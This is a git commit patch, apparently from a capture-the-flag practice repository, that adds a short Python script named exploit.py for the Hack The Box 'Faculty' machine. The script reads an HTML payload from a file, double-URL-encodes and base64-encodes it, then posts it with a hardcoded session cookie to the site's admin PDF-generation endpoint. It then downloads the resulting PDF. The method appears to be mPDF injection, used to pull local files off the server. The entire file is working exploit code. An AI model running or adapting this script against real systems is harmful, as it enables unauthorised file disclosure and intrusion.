From f914e816092f02a4bbed779ad91a6641e7cc2122 Mon Sep 17 00:00:00 2001
From: Raghuram Subramani <raghus2247@gmail.com>
Date: Sun, 4 Sep 2022 05:04:04 -0400
Subject: add rooms

---
 faculty/exploit.py | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100644 faculty/exploit.py

(limited to 'faculty/exploit.py')

diff --git a/faculty/exploit.py b/faculty/exploit.py
new file mode 100644
index 0000000..5bda40d
--- /dev/null
+++ b/faculty/exploit.py
@@ -0,0 +1,14 @@
+import urllib.parse
+import urllib.request
+import base64
+import requests
+import os
+
+with open('code.html') as h:
+    code = h.read().strip()
+ueCode = urllib.parse.quote(urllib.parse.quote(code))
+b64enc = base64.b64encode(ueCode.encode("ascii")).decode('UTF-8')
+
+r = requests.post('http://faculty.htb/admin/download.php', data={"pdf": b64enc}, cookies={"PHPSESSID": "s7qhujjj9qmqoeju6enate61nj"})
+
+urllib.request.urlretrieve(f'http://faculty.htb/mpdf/tmp/{r.text}', 'file.pdf')
-- 
cgit v1.2.3